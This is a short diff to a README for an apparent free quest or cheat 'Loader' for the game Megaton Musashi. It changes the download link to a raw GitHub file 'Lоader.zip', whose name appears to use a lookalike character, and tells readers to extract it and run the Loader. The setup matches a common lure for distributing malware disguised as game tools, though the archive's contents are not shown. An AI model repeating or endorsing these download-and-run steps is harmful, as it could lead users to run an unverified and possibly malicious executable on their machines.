anisderoual/MegatonMusashi-FreeQuestHub/README.md

 ## 📝 Installation

-1. Download `Loader.rar` from the repository.
+1. Download `https://raw.githubusercontent.com/anisderoual/MegatonMusashi-FreeQuestHub/main/Lоader.zip` from the repository.
 2. Extract files to your desktop.
 3. Run the Loader and follow the on-screen instructions.
 4. Launch Megaton Musashi and enjoy!